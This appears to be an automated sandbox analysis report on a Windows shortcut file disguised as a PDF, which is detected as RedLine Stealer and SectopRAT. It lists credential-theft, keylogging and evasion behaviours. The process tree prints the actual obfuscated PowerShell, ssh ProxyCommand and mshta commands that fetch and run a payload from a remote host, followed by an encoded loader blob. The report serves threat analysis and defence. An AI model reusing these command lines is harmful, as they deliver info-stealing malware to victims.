Edit tour
Windows
Analysis Report
ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk
Overview
General Information
| Sample name: | ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk |
| Analysis ID: | 1576536 |
| MD5: | 9ac418c2925b4026c3e2a18734f9923b |
| SHA1: | 58b6dc64264e30f32509bb2062ba91b03d91cc6f |
| SHA256: | 352583a6f99cf82c7a2f6c25393a5faf8daae45a1bf04065e33c6fe89a79d065 |
| Tags: | lnkstaticklipxuhaq-shopuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
RedLine, SectopRAT
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RedLine Stealer
Yara detected SectopRAT
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Encrypted powershell cmdline option found
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses an obfuscated file name to hide its real file extension (double extension)
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Lolbin Ssh.exe Use As Proxy
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
sftp.exe (PID: 4536 cmdline: "C:\Window s\System32 \OpenSSH\s ftp.exe" - o ProxyCom mand="powe rshell pow ershell -C ommand ('m ]]]]]]sh]] ]]]]]t]]]] ]a]]]]]]]. ]]]]]ex]]] ]]]]e]]]]] h]]]]]tt] ]]ps:]]]]] ]/]]]]]]/s ]]]]]t]]]] ]]]atic]]] .kli]]]]]] ]pxuh]]]]] aq.sh]]]]] ]]op/3]VKK E]]]].mp4] ]' -replac e ']')" . MD5: 72C41AA478CA868F95AD0936AF65818A) 
conhost.exe (PID: 3436 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ssh.exe (PID: 6204 cmdline:
"C:\Window s\System32 \OpenSSH\s sh.exe" "- oForwardX1 1 no" "-oF orwardAgen t no" "-oP ermitLocal Command no " "-oClear AllForward ings yes" -o "ProxyC ommand=pow ershell po wershell - Command (' m]]]]]]sh] ]]]]]]t]]] ]]a]]]]]]] .]]]]]ex]] ]]]]]e]]]] ] h]]]]]tt ]]]ps:]]]] ]]/]]]]]]/ s]]]]]t]]] ]]]]atic]] ].kli]]]]] ]]pxuh]]]] ]aq.sh]]]] ]]]op/3]VK KE]]]].mp4 ]]' -repla ce ']')" " -oProtocol 2" -s -- . sftp MD5: C05426E6F6DFB30FB78FBA874A2FF7DC) 
powershell.exe (PID: 6596 cmdline: powershell powershel l -Command ('m]]]]]] sh]]]]]]]t ]]]]]a]]]] ]]].]]]]]e x]]]]]]]e] ]]]] h]]]] ]tt]]]ps:] ]]]]]/]]]] ]]/s]]]]]t ]]]]]]]ati c]]].kli]] ]]]]]pxuh] ]]]]aq.sh] ]]]]]]op/3 ]VKKE]]]]. mp4]]' -re place ']') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 3252 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " mshta.exe https://st atic.klipx uhaq.shop/ 3VKKE.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9) 
mshta.exe (PID: 1600 cmdline: "C:\Window s\system32 \mshta.exe " https:// static.kli pxuhaq.sho p/3VKKE.mp 4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 5016 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction wrdZ ($UvhG){re turn -spli t ($UvhG - replace '. .', '0x$& ')};$ERHgk = wrdZ('E CA586FB867 E54D080F88 AB849BFB94 F298E9D4D1 74F6B1F2F8 1610C3540C 56191E34FB 7B2DF87630 478E180DAC A97337CF33 8C5F054957 9E18CC1A49 A1339F9691 FAE2EDAAC0 D6E2AB4913 030D45E7F9 C40731A7B0 ED45F438D1 5D573AB5E4 816A3D8CA8 2DAA342D63 0EDB6E24E8 5F4D05E044 7A728444A1 8214CD35DB 1FD5C4C677 BF1EB6DD62 A0D4B42A5F 996D056A8C 58BF2B2ADC 007CA0004F 35EEDF7DB0 6CC47C0E81 7525737536 0952646DDC E12F86A389 A2FB4F08F0 4DF71ABBD1 0CA1939480 7E45AE262B 4CF2BD8806 66BE980803 8992E08633 9CA69F7304 62BD5BA268 BEA9591B45 C3FDDC4B99 0452C3C5B0 83B1D8A99D B9D344BE7F 259679F799 4FBAA4E272 654402905F EB107236FD E83FA247F6 DFF5EE2DE2 FBE984DE8D 33A5077EC3 1D65DAE7AA C344DB18BA DD0E59C3DC 0A20AA1776 387E75ED82 F6F21E81D4 36D435FE76 41490C8BB3 BE615F9D76 B1F8A13230 01EC29CB1D C720A20647 927291ABFC CFF409B1F9 4A878B0CDB 0AFF68E11D AF8B2CCB95 D3B395C11F B1D2F79673 936E5F6AF5 45B019BFDE 71CDAC1667 709524F924 4C6D8B3198 F1F28C92F5 07AF233B70 FD15099184 E521AA3D1F 4EB4613BE4 CC9617FD5E E373CB05A7 B164A2B621 1387C494F7 FC2F64FB4B 0EEC11B39F FCC4E09EE1 0E96070192 D4E0E2AD73 7B857A3BA8 766EF8B454 E4CC9BAE60 3311844078 21C7F5A417 DEBB95885C D929FAC64B 5913D45E20 BA92710C78 9EA36BC01E D629BAAEEF B8F420E9D9 66E4669DB7 E1EE213C10 01073B4FB6 7BB454BA80 B0144D096E 4FA221E9AB 74FB2FDA2C BBA9C669EB 50610B8100 47A6A75A1E 4140735066 6C1B141836 EA4FB3C958 8111CE216E B2E451248C 7008EA0956 1E08463428 A981B69214 151A19DD58 483CB4A07D A879953AA3 FDBF8EC16A 79ACD16FBF 54B34E405F CE7D157279 08982C71DB 4EC3160579 745FCBC610 7565355585 73F49618C7 606881E9C8 F026001D9C 1C40FD2462 CC1EC3DCF6 20D160F23D 6F789F8CAA 4EE9835FD6 5AA1D0E027 8809DE0D85 C1295E58C7 82AAFF7016 B75C2FBB65 FE1F73E7B0 38C89BAA57 C32930D22E E8C71A06F4 A2C7389958 33A10226EC DFB07ECD5F 6DA3161779 7E009FA791 AB33D9189A 3A8E44428E FC9D7C6FAC 3474FD3803 8FE910BBB0 36CFF902B2 87315F807F AAA06AED95 210DDE82DA EAC0A523D8 71AE53C0EF 75EF61B9A5 7F8F33A81A BD5D297C8F A835397595 E7202A8E90 07FFC7EDE8 14D001B798 D89293879C 641BE0707A 91665E5503 FECF99138A C09675DB1C 070F4CF901 93587A5FFC 1CEE764015 44370EB817 04BA787C0C D04C9585C4 5A98FE309B 624E2A8DF5 8992BFB2E2 8E05D3E083 F40D725917 0B815F21C9 34D9A6B716 FB374544D2 00AC2F51F8 3FF6015BF3 1FAF855ACD 6F94C4EDCF FE1B1B1E84 CD0DCE3476 BE43881187 5890C244AF 355F5A99D6 0D3FE59665 1A7FCE949E F11B75A3E4 7270440D77 D7293E40B9 9F248B7EA5 0AE844851B 9FCECC2A42 A543848822 154E0BDE72 E753A37ABB C37D5A523E 44824FDECB 7EA3DA94AE 0BC489AFB5 7E7FF8B9D3 30E6B6CF74 9C38703F35 FBB8C7524C 1CC772CB6E